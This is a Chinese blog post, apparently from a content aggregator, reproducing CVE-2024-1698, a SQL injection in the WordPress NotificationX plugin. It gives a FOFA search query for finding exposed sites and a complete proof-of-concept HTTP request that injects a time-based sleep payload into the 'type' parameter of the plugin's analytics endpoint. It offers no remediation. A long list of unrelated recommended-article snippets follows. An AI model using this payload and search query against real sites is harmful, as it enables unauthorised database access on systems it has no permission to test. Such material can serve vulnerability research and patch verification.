OidBoy_G
OidBoy_G

WordPress Plugin NotificationX插件 SQL注入漏洞复现(CVE-2024-1698)

0x01 产品简介

WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。

0x02 漏洞概述

WordPress plugin NotificationX是一个应用插件。2.8.2版本及之前 存在安全漏洞,该漏洞源于对用户提供的参数转义不充分以及对现有 SQL 查询缺乏充分的准备,很容易通过“type”参数受到 SQL 注入攻击。

0x03 复现环境

FOFA:body="/wp-content/plugins/notificationx"

WordPress Plugin NotificationX插件 SQL注入漏洞复现(CVE-2024-1698)_第1张图片

0x04 漏洞复现

PoC

POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: your-ip
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

PS:延时注入并非实际返回时间

你可能感兴趣的:(漏洞复现,sql,web安全,安全)

  • 阿里云安全访问AWS服务的极简方案:PrivateLink实战指南 ivwdcwso 运维与云原生阿里云安全awsPrivateLink跨云方案
    无需公网/IP白名单/复杂路由,三步构建跨云专属通道当你的阿里云应用需要访问AWS的S3、Lambda或数据库时,是否还在为开放公网端口、配置VPN路由而头疼?本文将用15分钟带你实现零暴露的跨云安全连接。一、为什么选择PrivateLink?假设你的业务存在以下场景:✅阿里云ECS需要读写AWSS3中的敏感数据✅跨云调用Lambda函数但要求流量不出互联网✅避免配置复杂VPN或专线传统方案痛点:
  • 【如何设置ssh免密登录】 岁月玲珑 linuxsshgithubgit
    设置SSH免密登录能够让你在不输入密码的情况下,通过SSH协议安全登录远程服务器。下面为你详细介绍设置步骤:1.生成SSH密钥对(若未生成)要生成SSH密钥对,可在本地终端执行以下命令:ssh-keygen-trsa-b4096-C"[email protected]"当系统提示你“Enterafileinwhichtosavethekey”时,你可以直接按回车键使用默认文件位置,也可以
  • SQL学习笔记5 彤银浦 sql学习笔记
    多表查询1、多表关系MySQL是一个关系型数据库,数据库中表与表之间存在关联。它们的关系根据一张表包含另外一张表数据的多少可以分为:(使用外键建立关系的方法不常用)一对多或多对一:在多的一方加入外键对应少的一方的主键多对一:在两张表中加入一张中间表,中间表中加入两个外键对应两张表的主键一对一:在一张表加入另一张表的外键,且将外键约束为唯一2、多表查询概述多表查询的语法:select字段from表1
  • SQL学习笔记6 彤银浦 sql学习笔记
    事务1、事务的概念事务就是多个操作的集合,事务将这一串操作作为一个整体向数据库提交,要么同时操作成功,要么同时失败在输入DML语句时,MySQL是自动将事务提交,因此要操作事务时需要手动开启事务操作流程为:开启事务(若中间有错,则回滚复原并报错)结束事务2、事务操作事务操作有两种方式方式一:关闭事务自动提交,改为手动提交查看事务提交方式:select@@autocommit设置事务提交方式:set
  • 【WCF】通过AOP实现基于JWT的授权与鉴权的实践 ArabySide #WCFjwtwcfaopc#
    系列文章目录链接:【WCF】基于WCF在WinForms搭建RESTful服务指南链接:【WCF】单例模式的线程安全缓存管理器实现,给你的WebApi加入缓存吧链接:【WCF】基于固定时间窗口的接口限流实现(借助IOperationInvoker的AOP方案)链接:【WCF】通过AOP实现基于JWT的授权与鉴权的实践文章目录系列文章目录写在前面一、JWT(JSONWebToken)1.1什么是JW
  • 网络请求——微信小程序学习笔记 十年之少 微信小程序学习笔记微信小程序学习笔记
    1.前言发起网络请求,即发起HTTPS网络请求,注意必须是HTTPS。2.使用前注意事项使用前注意事项可参考官网文档:基础能力/网络/使用说明简单的来说,为了安全,服务器域名必须要备案,如果只是想测试一下,可以设置项目属性中设置不校验域名。2.1测试版-项目配置不校验域名微信开发者工具中打开需要配置的项目,点击【详情】,选择【本地设置】,勾选【不校验合法域名……】。2.2配置request合法域名
  • Apache HTTP Server部署全攻略 Sally璐璐 运维apachehttp网络协议运维
    httpd简介httpd(ApacheHTTPServer)是一款历史悠久的开源Web服务器软件,由Apache软件基金会开发和维护。自1995年首次发布以来,Apache一直是Web服务器领域的领导者,以其稳定性、安全性和灵活性著称。根据W3Techs的最新统计,httpd支持着全球超过40%的网站运行,特别是在企业级应用中占据重要地位。httpd的主要特点包括:模块化架构:通过动态加载模块扩展
  • MySQL自增约束 @一叶之秋 MySQL理论学习
    1、自增约束特点:(1)一个表只能有一个自增约束因为一个表只有一个维护自增值的变量。(2)自增约束的列只能是整数列(3)自增约束的列必须是键列(主键,唯一键,外键),实际中一般是主键自增最多2、如何在建表时指定某个列自增createtable【数据库名.】表名称(字段名1xxIntprimarykeyauto_increment,字段名2数据类型【uniquekey】【notnull】defaul
  • 作为创业者,DeepSeek爆火带来的七点启示 墨菲安全 人工智能DeepSeek软件供应链安全
    这个春节DeepSeek真的是火到不行,什么概念呢?当年某大厂春晚砸了20多个亿的营销费用,所带来的影响力和品牌曝光可能不及DeepSeek在这个春节期间的1/2。DeepSeek不仅出圈了,而且是形成了全球影响力。我们墨菲安全也是一家在行业内并没有太高知名度的创业公司,也是在埋头做产品的阶段。DeepSeek这个事情对我们的触动是非常之大的,甚至我都开始认为DeepSeek这一代的企业和企业家们
  • 剖析美国政府视角下的ICT供应链安全 墨菲安全 网络安全软件供应链
    2018年11月15日,美国国土安全部(DHS)宣布成立了信息和通信技术(ICT)供应链风险管理(SCRM)工作组,这个工作组是由美国多个政府部门、IT行业企业代表及通信行业企业代表联合成立的。该组织对外宣传的目标是识别和管理全球ICT供应链的风险。之后该组织非常活跃,2024年2月6日,该组织刚刚宣布将工作组延长两年。我们翻阅了该组织从成立至今参与和主导发布的大量文章,从这里面可以发现该组织对于
  • 墨菲安全在软件供应链安全领域阶段性总结及思考
    向外看:墨菲安全在软件供应链安全领域的一些洞察、思考、行动洞察现状&挑战:过去开发安全体系是无法解决软件供应链安全问题的;一些过去专注开发安全领域的厂商正在错误的引导行业用开发安全思维解决软件供应链安全问题,治标不治本;这导致行业(安全厂商/企业/监管)大部分人对于软件供应链安全仍然缺乏理性的认知;过去以开发安全为主营业务的安全厂商将越来越无法适应软件供应链安全领域日益成熟的市场需求;正在发生的:
  • 网络编程(17)——asio多线程模型IOThreadPool 爱吃土豆zzz 网络编程单例模式c++网络编程asio
    十七、day17之前我们介绍了IOServicePool的方式,一个IOServicePool开启n个线程和n个iocontext,每个线程内独立运行iocontext,各个iocontext监听各自绑定的socket是否就绪,如果就绪就在各自线程里触发回调函数。为避免线程安全问题,我们将网络数据封装为逻辑包投递给逻辑系统,逻辑系统有一个单独线程处理,这样将网络IO和逻辑处理解耦合,极大的提高了服
  • iOS安全和逆向系列教程 第1篇: iOS逆向工程概述与学习路线图 自学不成才 iOS安全和逆向系列教程ios学习cocoa
    iOS安全和逆向系列教程第1篇:iOS逆向工程概述与学习路线图欢迎各位加入我的iOS逆向工程专栏!在这个系列的第一篇文章中,我将为大家介绍iOS逆向工程的基本概念、应用场景以及完整的学习路线图,帮助大家建立清晰的学习框架。什么是iOS逆向工程?逆向工程(ReverseEngineering)是一种通过分析已有产品(如软件、硬件)来理解其设计、功能和工作原理的过程。在iOS领域,逆向工程特指通过各种
  • C++ 泛型编程利器:模板机制 筏.k c++知识点c++算法开发语言
    C++泛型编程利器:模板机制全解析——类型安全与代码复用的完美结合(含实战陷阱)更新时间:2025年6月19日️标签:C++|模板|泛型编程|函数模板|类模板|C++基础文章目录前言一、基础概念:C++模板1.什么是模板2.模板的作用二、语法详解:模板的实现1.函数模板1.1基本语法1.2多类型参数1.3非类型参数2.类模板2.1基本语法2.2模板特化2.3偏特化3.2类型推导⚠️三、常见陷阱陷阱
  • Hadoop、Spark、Flink 三大大数据处理框架的能力与应用场景
    一、技术能力与应用场景对比产品能力特点应用场景Hadoop-基于MapReduce的批处理框架-HDFS分布式存储-容错性强、适合离线分析-作业调度使用YARN-日志离线分析-数据仓库存储-T+1报表分析-海量数据处理Spark-基于内存计算,速度快-支持批处理、流处理(StructuredStreaming)-支持SQL、ML、图计算等-支持多语言(Scala、Java、Python)-近实时处
  • 欢乐熊大话蓝牙知识24:LE Secure Connections 是 BLE 的安全升级术 欢乐熊嵌入式编程 欢乐熊大话蓝牙知识安全BLE蓝牙低功耗蓝牙LESecureGATT蓝牙
    《LESecureConnections是BLE的安全升级术》还在用JustWorks?你家智能锁可能比你家门还容易被打开。今天我们来聊聊BLE中的“防身绝技”——LESecureConnections(LESC),它到底有多安全?又该怎么用?一、LESecureConnections是啥?一句话解释:LESecureConnections是BLE自4.2版本引入的“升级配对方式”,它不再是“小打
  • Web学习:SQL注入之联合查询注入 kaikaile1995 前端学习sql
    SQL注入(SQLInjection)是一种常见且危害极大的Web安全漏洞,攻击者可以通过构造恶意的SQL语句窃取、篡改数据库中的数据,甚至控制整个数据库服务器。本文将深入探讨SQL注入的一个重要变种——联合查询注入(Union-basedSQLInjection),介绍其原理、常见攻击方式、以及防御措施。SQL注入概述SQL注入是指将恶意的SQL代码插入到应用程序的输入字段中,使得这些代码被意外
  • shopex48mysql索引优化 showker mysql
    altertablesdb_pluginsaddindexidx_type_identifier(plugin_type,plugin_ident);CREATEINDEXidx_disabled_varnameONsdb_magicvars(disabled,var_name);CREATEINDEXidx_goods_type_spec_typeidONsdb_goods_type_spec(
  • C++实现单例模式 cxpxatu521 C++设计模式c++设计模式
    C++实现单例模式单例模式的定义:第一种实现方式:饿汉模式1.适用场景2.优缺点3.是否线程安全4.c++代码实现第二种实现方式:懒汉模式1.适用场景2.优缺点3.是否是线程安全的4.代码实现5.懒汉模式在Linux环境下的实现单例模式的定义:一种创建类型的设计模式,通过单例模式的方法创建的类只能有一个实例,也就是说一个类只能创建一个对象。根据实现方式的不同,又可以分为饿汉模式和懒汉模式第一种实现
  • [ vulhub漏洞复现篇 ] Drupal XSS漏洞 (CVE-2019-6341) 寒蝉听雨[原ID_PowerShell] [靶场实战]vulhubvulhub漏洞复现DrupalXSS漏洞CVE-2019-6341渗透测试网络安全
    博主介绍‍博主介绍:大家好,我是_PowerShell,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!文章目录博主介绍一、漏洞编号二、影响范围三、漏洞描述四、环境搭建1、进入CVE-2019-6341环境2、启动CVE-20
  • 高防CDN:网络安全的“盾牌”与加速利器 上海云盾-高防顾问 web安全网络安全
    在数字化时代,网络安全和访问速度是网站运营的两大核心挑战。尤其是面对日益频繁的DDoS攻击和全球用户对快速访问的需求,高防CDN(高防御内容分发网络)成为企业和开发者的重要选择。本文将用通俗易懂的方式,解析高防CDN的概念及其工作原理。什么是高防CDN?高防CDN是融合了CDN加速与DDoS防护能力的网络安全服务。它不仅通过全球分布的节点缓存内容,提升用户访问速度,还能识别并抵御大规模流量攻击(如
  • 揭秘网络安全:数字世界的隐形防线
    目录一、网络安全:数字时代的关键锁钥二、常见网络安全威胁大起底2.1网络诈骗:狡猾的数字陷阱2.2恶意软件:隐匿的数字刺客2.3数据泄露:隐私的无声暴露2.4网络钓鱼:伪装的数字猎手三、筑牢网络安全防线的策略3.1提升安全意识:思想上的防火墙3.2强化密码管理:账户的坚固盾牌3.3谨慎使用公共网络:公共场合的安全警惕3.4定期更新软件和系统:修复漏洞的及时补丁3.5开启防护工具:数字世界的安全卫士
  • 计算机专业毕业设计选题指南(2025创新版) 程序员小天00 课程设计毕业设计小程序pythoneclipsejava
    计算机专业毕业设计选题指南(2025创新版)一、选题方向全景图(按技术维度划分)智能服务系统开发技术架构:SpringBoot+Vue3+MySQL/MongoDB典型场景:●智慧校园:实验室预约系统、学术成果可视化平台●医疗健康:电子病历智能分析系统、慢性病管理助手●城市治理:垃圾分类智能识别系统、交通拥堵预测模型创新点:融合OCR识别/NLP技术,实现无感化服务跨平台应用开发技术选型:Unia
  • 地理信息安全与隐私保护:守护你我位置的隐形盾牌 GeoSaaS 地理信息网络安全物联网无人机机器人gis智慧城市
    在数字时代,地理信息技术如地理信息系统(GIS)和全球定位系统(GPS)已成为日常生活不可或缺的一部分,它们为我们带来便利的同时,也悄然触及个人隐私的敏感地带。今天,我们就来聊聊地理信息收集和使用中的隐私保护,如何在享受科技福利的同时,确保个人信息的安全无虞。个人隐私为何重要?个人隐私是每个人的基本权利,它关乎个人自由、尊严与安全。地理信息,如行踪记录、家庭住址等,一旦泄露,可能导致身份盗用、骚扰
  • 如何禁止GPTBot等爬虫爬取网站内容:保护数据安全的实用指南 淮橘√ 人工智能
    引言随着人工智能技术的快速发展,网络爬虫(如OpenAI的GPTBot、GoogleBot、Anthropic的ClaudeBot等)被广泛用于抓取网站数据以训练AI模型或索引内容。然而,部分网站管理员可能不希望自己的内容被爬虫抓取,原因包括保护原创内容、降低服务器负载或防止数据被滥用。一、为什么需要禁止爬虫?网络爬虫可能带来以下问题:内容盗用风险:原创内容可能被AI模型或其他服务未经授权使用。服
  • 宝塔面板10.0新版本公测特色功能深度解析 淮橘√ 运维服务器
    引言宝塔面板(BTPanel)作为一款广受欢迎的服务器管理工具,以其简洁的界面和强大的功能深受运维人员和站长的喜爱。2025年,宝塔面板迎来了10.0版本的重大更新,带来了多项创新功能和性能优化,进一步提升了服务器管理的效率和安全性。一、宝塔面板10.0版本概览宝塔面板10.0是继9.x系列后的重大版本升级,官方于2025年初发布(具体日期以官网为准,参考宝塔官网及论坛)。新版本在界面设计、功能扩
  • Sqlserver CTE递归--奖金池计算
    最简单的递归WITHRecursiveCTE(Number)AS(--锚点成员SELECT1ASNumberUNIONALL--递归成员SELECTNumber+1FROMRecursiveCTEWHERENumber=奖金池基准THEN本月调整奖金-奖金池基准ELSE0ENDAS本月发放奖金,CASEWHEN本月调整奖金>=奖金池基准THEN奖金池基准ELSE本月调整奖金ENDAS结余奖金池,C
  • 网络安全:构建数字世界的坚实防线
    文章目录网络安全:构建数字世界的坚实防线一、网络安全的重要性1.保护个人隐私2.维护商业利益3.保障国家安全4.防止经济犯罪5.确保业务连续性二、网络安全现状1.数据泄露频发2.隐私保护堪忧3.网络犯罪猖獗三、网络安全防范措施1.密码管理2.个人信息保护3.安全软件和更新4.网络访问控制5.数据备份和恢复6.培养安全意识四、未来展望1.技术创新2.法规完善3.国际合作4.社会共治网络安全:构建数字
  • 用户实体行为分析与数据异常访问联防方案 KKKlucifer 时序数据库
    一、用户实体行为分析(UEBA)技术概述1.1定义与概念用户实体行为分析(UEBA)是一种高级网络安全方法,它利用机器学习和行为分析技术,对用户、设备、应用程序等实体在网络环境中的行为进行深入分析,以检测出异常行为和潜在的安全威胁。UEBA的核心在于通过建立行为基线,识别出偏离正常行为模式的活动,从而发现那些传统安全工具难以检测到的高级、隐藏和内部威胁。1.2工作原理UEBA系统通过收集来自多个数
  • 动态脱敏引擎设计:基于上下文感知的字段级权限控制模型
    在数据流通日益频繁的数字化时代,敏感数据泄露风险持续攀升。传统脱敏技术多采用静态规则,难以适应复杂多变的业务场景,导致数据保护与业务需求间矛盾突出。动态脱敏引擎基于上下文感知的字段级权限控制模型,通过实时分析数据访问场景,实现对敏感字段的精细化权限管理与动态脱敏处理,为数据安全流通提供有效保障。一、核心痛点与需求分析1.1传统脱敏技术的局限性静态脱敏规则难以应对动态业务需求,存在过度脱敏影响数据可
  • mongodb3.03开启认证 21jhf mongodb
    下载了最新mongodb3.03版本,当使用--auth 参数命令行开启mongodb用户认证时遇到很多问题,现总结如下: (百度上搜到的基本都是老版本的,看到db.addUser的就是,请忽略) Windows下我做了一个bat文件,用来启动mongodb,命令行如下: mongod --dbpath db\data --port 27017 --directoryperdb --logp
  • 【Spark103】Task not serializable bit1129 Serializable
    Task not serializable是Spark开发过程最令人头疼的问题之一,这里记录下出现这个问题的两个实例,一个是自己遇到的,另一个是stackoverflow上看到。等有时间了再仔细探究出现Task not serialiazable的各种原因以及出现问题后如何快速定位问题的所在,至少目前阶段碰到此类问题,没有什么章法 1.   package spark.exampl
  • 你所熟知的 LRU(最近最少使用) dalan_123 java
    关于LRU这个名词在很多地方或听说,或使用,接下来看下lru缓存回收的实现 1、大体的想法     a、查询出最近最晚使用的项     b、给最近的使用的项做标记 通过使用链表就可以完成这两个操作,关于最近最少使用的项只需要返回链表的尾部;标记最近使用的项,只需要将该项移除并放置到头部,那么难点就出现 你如何能够快速在链表定位对应的该项? 这时候多
  • Javascript 跨域 周凡杨 JavaScriptjsonp跨域cross-domain
                                       
  • linux下安装apache服务器 g21121 apache
    安装apache 下载windows版本apache,下载地址:http://httpd.apache.org/download.cgi   1.windows下安装apache Windows下安装apache比较简单,注意选择路径和端口即可,这里就不再赘述了。 2.linux下安装apache: 下载之后上传到linux的相关目录,这里指定为/home/apach
  • FineReport的JS编辑框和URL地址栏语法简介 老A不折腾 finereportweb报表报表软件语法总结
      JS编辑框: 1.FineReport的js。 作为一款BS产品,browser端的JavaScript是必不可少的。 FineReport中的js是已经调用了finereport.js的。 大家知道,预览报表时,报表servlet会将cpt模板转为html,在这个html的head头部中会引入FineReport的js,这个finereport.js中包含了许多内置的fun
  • 根据STATUS信息对MySQL进行优化 墙头上一根草 status
    mysql  查看当前正在执行的操作,即正在执行的sql语句的方法为:      show processlist 命令   mysql> show global status;可以列出MySQL服务器运行各种状态值,我个人较喜欢的用法是show status like '查询值%';一、慢查询mysql> show variab
  • 我的spring学习笔记7-Spring的Bean配置文件给Bean定义别名 aijuans Spring 3
    本文介绍如何给Spring的Bean配置文件的Bean定义别名? 原始的 <bean id="business" class="onlyfun.caterpillar.device.Business"> <property name="writer"> <ref b
  • 高性能mysql 之 性能剖析 annan211 性能mysqlmysql 性能剖析剖析
    1 定义性能优化 mysql服务器性能,此处定义为 响应时间。 在解释性能优化之前,先来消除一个误解,很多人认为,性能优化就是降低cpu的利用率或者减少对资源的使用。 这是一个陷阱。 资源时用来消耗并用来工作的,所以有时候消耗更多的资源能够加快查询速度,保持cpu忙绿,这是必要的。很多时候发现 编译进了新版本的InnoDB之后,cpu利用率上升的很厉害,这并不
  • 主外键和索引唯一性约束 百合不是茶 索引唯一性约束主外键约束联机删除
    目标;第一步;创建两张表 用户表和文章表         第二步;发表文章       1,建表; ---用户表 BlogUsers --userID唯一的 --userName --pwd --sex create
  • 线程的调度 bijian1013 java多线程thread线程的调度java多线程
    1.       Java提供一个线程调度程序来监控程序中启动后进入可运行状态的所有线程。线程调度程序按照线程的优先级决定应调度哪些线程来执行。   2.       多数线程的调度是抢占式的(即我想中断程序运行就中断,不需要和将被中断的程序协商) a) 
  • 查看日志常用命令 bijian1013 linux命令unix
    一.日志查找方法,可以用通配符查某台主机上的所有服务器grep "关键字" /wls/applogs/custom-*/error.log   二.查看日志常用命令1.grep '关键字' error.log:在error.log中搜索'关键字'2.grep -C10 '关键字' error.log:显示关键字前后10行记录3.grep '关键字' error.l
  • 【持久化框架MyBatis3一】MyBatis版HelloWorld bit1129 helloworld
    MyBatis这个系列的文章,主要参考《Java Persistence with MyBatis 3》。   样例数据 本文以MySQL数据库为例,建立一个STUDENTS表,插入两条数据,然后进行单表的增删改查     CREATE TABLE STUDENTS ( stud_id int(11) NOT NULL AUTO_INCREMENT,
  • 【Hadoop十五】Hadoop Counter bit1129 hadoop
       1. 只有Map任务的Map Reduce Job File System Counters FILE: Number of bytes read=3629530 FILE: Number of bytes written=98312 FILE: Number of read operations=0 FILE: Number of lar
  • 解决Tomcat数据连接池无法释放 ronin47 tomcat 连接池 优化
    近段时间,公司的检测中心报表系统(SMC)的开发人员时不时找到我,说用户老是出现无法登录的情况。前些日子因为手头上 有Jboss集群的测试工作,发现用户不能登录时,都是在Tomcat中将这个项目Reload一下就好了,不过只是治标而已,因为大概几个小时之后又会 再次出现无法登录的情况。 今天上午,开发人员小毛又找到我,要我协助将这个问题根治一下,拖太久用户难保不投诉。 简单分析了一
  • java-75-二叉树两结点的最低共同父结点 bylijinnan java
    import java.util.LinkedList; import java.util.List; import ljn.help.*; public class BTreeLowestParentOfTwoNodes { public static void main(String[] args) { /* * node data is stored in
  • 行业垂直搜索引擎网页抓取项目 carlwu LuceneNutchHeritrixSolr
    公司有一个搜索引擎项目,希望各路高人有空来帮忙指导,谢谢! 这是详细需求: (1) 通过提供的网站地址(大概100-200个网站),网页抓取程序能不断抓取网页和其它类型的文件(如Excel、PDF、Word、ppt及zip类型),并且程序能够根据事先提供的规则,过滤掉不相干的下载内容。 (2) 程序能够搜索这些抓取的内容,并能对这些抓取文件按照油田名进行分类,然后放到服务器不同的目录中。
  • [通讯与服务]在总带宽资源没有大幅增加之前,不适宜大幅度降低资费 comsci 资源
          降低通讯服务资费,就意味着有更多的用户进入,就意味着通讯服务提供商要接待和服务更多的用户,在总体运维成本没有由于技术升级而大幅下降的情况下,这种降低资费的行为将导致每个用户的平均带宽不断下降,而享受到的服务质量也在下降,这对用户和服务商都是不利的。。。。。。。。     &nbs
  • Java时区转换及时间格式 Cwind java
    本文介绍Java API 中 Date, Calendar, TimeZone和DateFormat的使用,以及不同时区时间相互转化的方法和原理。   问题描述: 向处于不同时区的服务器发请求时需要考虑时区转换的问题。譬如,服务器位于东八区(北京时间,GMT+8:00),而身处东四区的用户想要查询当天的销售记录。则需把东四区的“今天”这个时间范围转换为服务器所在时区的时间范围。
  • readonly,只读,不可用 dashuaifu jsjspdisablereadOnlyreadOnly
    readOnly 和 readonly 不同,在做js开发时一定要注意函数大小写和jsp黄线的警告!!!我就经历过这么一件事: 使用readOnly在某些浏览器或同一浏览器不同版本有的可以实现“只读”功能,有的就不行,而且函数readOnly有黄线警告!!!就这样被折磨了不短时间!!!(期间使用过disable函数,但是发现disable函数之后后台接收不到前台的的数据!!!)  
  • LABjs、RequireJS、SeaJS 介绍 dcj3sjt126com jsWeb
    LABjs 的核心是 LAB(Loading and Blocking):Loading 指异步并行加载,Blocking 是指同步等待执行。LABjs 通过优雅的语法(script 和 wait)实现了这两大特性,核心价值是性能优化。LABjs 是一个文件加载器。RequireJS 和 SeaJS 则是模块加载器,倡导的是一种模块化开发理念,核心价值是让 JavaScript 的模块化开发变得更
  • [应用结构]入口脚本 dcj3sjt126com PHPyii2
    入口脚本 入口脚本是应用启动流程中的第一环,一个应用(不管是网页应用还是控制台应用)只有一个入口脚本。终端用户的请求通过入口脚本实例化应用并将将请求转发到应用。 Web 应用的入口脚本必须放在终端用户能够访问的目录下,通常命名为 index.php,也可以使用 Web 服务器能定位到的其他名称。 控制台应用的入口脚本一般在应用根目录下命名为 yii(后缀为.php),该文
  • haoop shell命令 eksliang hadoophadoop shell
    cat chgrp chmod chown copyFromLocal copyToLocal cp du dus expunge get getmerge ls lsr mkdir movefromLocal mv put rm rmr setrep stat tail test text
  • MultiStateView不同的状态下显示不同的界面 gundumw100 android
    只要将指定的view放在该控件里面,可以该view在不同的状态下显示不同的界面,这对ListView很有用,比如加载界面,空白界面,错误界面。而且这些见面由你指定布局,非常灵活。 PS:ListView虽然可以设置一个EmptyView,但使用起来不方便,不灵活,有点累赘。 <com.kennyc.view.MultiStateView xmlns:android=&qu
  • jQuery实现页面内锚点平滑跳转 ini JavaScripthtmljqueryhtml5css
    平时我们做导航滚动到内容都是通过锚点来做,刷的一下就直接跳到内容了,没有一丝的滚动效果,而且 url 链接最后会有“小尾巴”,就像#keleyi,今天我就介绍一款 jquery 做的滚动的特效,既可以设置滚动速度,又可以在 url 链接上没有“小尾巴”。   效果体验:http://keleyi.com/keleyi/phtml/jqtexiao/37.htmHTML文件代码: &
  • kafka offset迁移 kane_xie kafka
    在早前的kafka版本中(0.8.0),offset是被存储在zookeeper中的。   到当前版本(0.8.2)为止,kafka同时支持offset存储在zookeeper和offset manager(broker)中。   从官方的说明来看,未来offset的zookeeper存储将会被弃用。因此现有的基于kafka的项目如果今后计划保持更新的话,可以考虑在合适
  • android > 搭建 cordova 环境 mft8899 android
      1 , 安装 node.js        http://nodejs.org      node -v   查看版本   2, 安装 npm   可以先从  https://github.com/isaacs/npm/tags  下载 源码 解压到
  • java封装的比较器,比较是否全相同,获取不同字段名字 qifeifei
     非常实用的java比较器,贴上代码: import java.util.HashSet; import java.util.List; import java.util.Set; import net.sf.json.JSONArray; import net.sf.json.JSONObject; import net.sf.json.JsonConfig; i
  • 记录一些函数用法 .Aky. 位运算PHP数据库函数IP
    高手们照旧忽略。 想弄个全天朝IP段数据库,找了个今天最新更新的国内所有运营商IP段,copy到文件,用文件函数,字符串函数把玩下。分割出startIp和endIp这样格式写入.txt文件,直接用phpmyadmin导入.csv文件的形式导入。(生命在于折腾,也许你们觉得我傻X,直接下载人家弄好的导入不就可以,做自己的菜鸟,让别人去说吧) 当然用到了ip2long()函数把字符串转为整型数
  • sublime text 3 rust wudixiaotie Sublime Text
    1.sublime text 3 => install package => Rust 2.cd ~/.config/sublime-text-3/Packages 3.mkdir rust 4.git clone https://github.com/sp0/rust-style 5.cd rust-style 6.cargo build --release 7.ctrl
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他